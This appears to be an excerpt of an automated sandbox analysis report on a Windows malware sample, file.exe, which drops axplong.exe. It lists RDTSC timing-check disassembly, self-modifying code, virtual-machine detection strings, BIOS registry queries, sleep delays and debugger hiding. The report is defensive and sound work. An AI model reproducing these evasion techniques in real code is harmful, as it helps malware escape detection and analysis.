                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90CFB second address: 4B90D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488C756CFEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90D0D second address: 4B90D11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90D11 second address: 4B90D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F488C756CFCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F488C756D00h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F488C756CFAh 0x0000001f xor cx, 8D28h 0x00000024 jmp 00007F488C756CFBh 0x00000029 popfd 0x0000002a popad 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push edi 0x00000030 pop eax 0x00000031 pushfd 0x00000032 jmp 00007F488C756D07h 0x00000037 add si, E71Eh 0x0000003c jmp 00007F488C756D09h 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90D97 second address: 4B90D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90D9D second address: 4B90DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B400CE second address: 4B40132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F488D0453FFh 0x00000009 add ax, E5CEh 0x0000000e jmp 00007F488D045409h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 jmp 00007F488D0453FAh 0x0000001e mov ecx, 3C393CE1h 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 mov ax, A719h 0x0000002a push eax 0x0000002b push edx 0x0000002c call 00007F488D045404h 0x00000031 pop ecx 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA024E second address: 4BA02AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007F488C756CFEh 0x00000011 push dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F488C756CFEh 0x0000001b jmp 00007F488C756D05h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 mov di, ax 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA02AA second address: 4BA036A instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 call 00007F488D0453F9h 0x0000000d jmp 00007F488D045405h 0x00000012 push eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F488D045407h 0x0000001a jmp 00007F488D045403h 0x0000001f popfd 0x00000020 mov eax, 681C859Fh 0x00000025 popad 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F488D0453FBh 0x00000031 adc ah, FFFFFFEEh 0x00000034 jmp 00007F488D045409h 0x00000039 popfd 0x0000003a jmp 00007F488D045400h 0x0000003f popad 0x00000040 mov eax, dword ptr [eax] 0x00000042 jmp 00007F488D0453FBh 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F488D045404h 0x00000052 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA036A second address: 4BA03AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756CFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 54CBE036h 0x00000012 pushfd 0x00000013 jmp 00007F488C756D07h 0x00000018 jmp 00007F488C756D03h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA03AF second address: 4BA03B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719221 second address: 719248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F488C756CF6h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50450 second address: 4B504B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F488D045408h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F488D0453FBh 0x0000000f adc al, 0000000Eh 0x00000012 jmp 00007F488D045409h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F488D0453FEh 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F488D0453FEh 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504B8 second address: 4B504BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504BE second address: 4B504C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504C2 second address: 4B504D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504D1 second address: 4B504D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504D7 second address: 4B5050F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F488C756D03h 0x00000009 and ax, 132Eh 0x0000000e jmp 00007F488C756D09h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5050F second address: 4B5052D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F488D045403h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5052D second address: 4B505D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b pushad 0x0000000c mov eax, 0CDA0223h 0x00000011 pushfd 0x00000012 jmp 00007F488C756D08h 0x00000017 xor cx, 3D68h 0x0000001c jmp 00007F488C756CFBh 0x00000021 popfd 0x00000022 popad 0x00000023 push 3EBB23A1h 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F488C756D05h 0x0000002f xor eax, 3EE75F86h 0x00000035 jmp 00007F488C756D01h 0x0000003a popfd 0x0000003b mov edi, esi 0x0000003d popad 0x0000003e xor dword ptr [esp], 4842E3B9h 0x00000045 jmp 00007F488C756CFAh 0x0000004a push 1777A5B5h 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B505D0 second address: 4B505D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B505D4 second address: 4B505DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B505DA second address: 4B505EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488D045400h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B505EE second address: 4B5065F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756CFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 5F79084Bh 0x00000012 jmp 00007F488C756D06h 0x00000017 mov eax, dword ptr fs:[00000000h] 0x0000001d jmp 00007F488C756D00h 0x00000022 nop 0x00000023 pushad 0x00000024 mov bh, ah 0x00000026 mov dx, BE2Eh 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007F488C756D04h 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F488C756CFAh 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5065F second address: 4B50663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50663 second address: 4B50669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50669 second address: 4B5066F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5066F second address: 4B50673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50673 second address: 4B5072F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 1Ch 0x0000000b pushad 0x0000000c call 00007F488D045402h 0x00000011 mov bl, ch 0x00000013 pop ebx 0x00000014 call 00007F488D0453FCh 0x00000019 pushfd 0x0000001a jmp 00007F488D045402h 0x0000001f sub cx, 1068h 0x00000024 jmp 00007F488D0453FBh 0x00000029 popfd 0x0000002a pop esi 0x0000002b popad 0x0000002c push eax 0x0000002d jmp 00007F488D045404h 0x00000032 mov dword ptr [esp], ebx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F488D0453FEh 0x0000003c sbb eax, 16538DF8h 0x00000042 jmp 00007F488D0453FBh 0x00000047 popfd 0x00000048 pushad 0x00000049 mov edi, esi 0x0000004b jmp 00007F488D045402h 0x00000050 popad 0x00000051 popad 0x00000052 xchg eax, esi 0x00000053 jmp 00007F488D045400h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c mov ecx, ebx 0x0000005e popad 0x0000005f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5072F second address: 4B50735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50735 second address: 4B50739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50739 second address: 4B5073D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5073D second address: 4B5074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5074B second address: 4B5077E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F488C756D05h 0x0000000a add eax, 5E460556h 0x00000010 jmp 00007F488C756D01h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5077E second address: 4B507C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007F488D045408h 0x0000000c adc si, 4EA8h 0x00000011 jmp 00007F488D0453FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F488D045405h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B507C9 second address: 4B50868 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F488C756D01h 0x0000000f xchg eax, edi 0x00000010 jmp 00007F488C756CFEh 0x00000015 mov eax, dword ptr [76FBB370h] 0x0000001a pushad 0x0000001b call 00007F488C756CFEh 0x00000020 pushad 0x00000021 popad 0x00000022 pop ecx 0x00000023 pushad 0x00000024 mov cx, dx 0x00000027 jmp 00007F488C756D03h 0x0000002c popad 0x0000002d popad 0x0000002e xor dword ptr [ebp-08h], eax 0x00000031 jmp 00007F488C756D06h 0x00000036 xor eax, ebp 0x00000038 pushad 0x00000039 mov dx, 7D22h 0x0000003d mov bx, 496Eh 0x00000041 popad 0x00000042 push esi 0x00000043 pushad 0x00000044 mov ecx, 1C5ADA07h 0x00000049 push eax 0x0000004a push edx 0x0000004b call 00007F488C756CFAh 0x00000050 pop eax 0x00000051 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50868 second address: 4B508E7 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 1EF6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F488D0453FDh 0x00000011 lea eax, dword ptr [ebp-10h] 0x00000014 jmp 00007F488D0453FEh 0x00000019 mov dword ptr fs:[00000000h], eax 0x0000001f pushad 0x00000020 movzx eax, dx 0x00000023 mov dx, 142Eh 0x00000027 popad 0x00000028 mov esi, dword ptr [ebp+08h] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F488D0453FBh 0x00000032 and ah, FFFFFFDEh 0x00000035 jmp 00007F488D045409h 0x0000003a popfd 0x0000003b popad 0x0000003c mov eax, dword ptr [esi+10h] 0x0000003f jmp 00007F488D0453FDh 0x00000044 test eax, eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B508E7 second address: 4B508ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B508ED second address: 4B508F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B508F3 second address: 4B508F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B508F7 second address: 4B5092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F48FF3B481Bh 0x0000000e jmp 00007F488D045408h 0x00000013 sub eax, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F488D0453FCh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5092D second address: 4B50933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50933 second address: 4B50937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50937 second address: 4B50963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756CFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-20h], eax 0x0000000e jmp 00007F488C756CFEh 0x00000013 mov ebx, dword ptr [esi] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov eax, ebx 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50963 second address: 4B5099D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045405h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-24h], ebx 0x0000000c jmp 00007F488D0453FEh 0x00000011 test ebx, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F488D0453FAh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5099D second address: 4B509A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B509A1 second address: 4B509A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B509A7 second address: 4B509AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B509AD second address: 4B509B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B509B1 second address: 4B509B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B509B5 second address: 4B509CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F48FF3B46B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dh, 52h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40ECD second address: 4B40F4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F488C756D07h 0x00000008 push eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F488C756D02h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F488C756CFDh 0x0000001e or ecx, 27BA61E6h 0x00000024 jmp 00007F488C756D01h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F488C756D00h 0x00000030 xor ah, FFFFFF88h 0x00000033 jmp 00007F488C756CFBh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 31EB3D second address: 31EB47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F488D0453F6h 0x0000000a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 31EB47 second address: 31EB4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 4946FB second address: 494716 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045407h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 494DD9 second address: 494DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 494DDF second address: 494DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Tries to evade debugger and weak emulator (self modifying code)
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 56EBC1 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 71010B instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 70E87D instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 56C3DE instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 738A4E instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 71DE6D instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 56EB09 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 31EBC1 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 4C010B instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 4BE87D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 31C3DE instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 4E8A4E instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 4CDE6D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 31EB09 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04BA02BB rdtsc 0_2_04BA02BB
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1240Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 435Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1191Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3152Thread sleep time: -46023s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4136Thread sleep count: 1240 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4136Thread sleep time: -2481240s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2108Thread sleep count: 435 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2108Thread sleep time: -13050000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4812Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2020Thread sleep count: 1191 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2020Thread sleep time: -2383191s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                    Source: file.exe, 00000000.00000002.1767968117.00000000006ED000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1796063216.000000000049D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1799827982.000000000049D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Hides threads from debuggers
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Potentially malicious time measurement code found
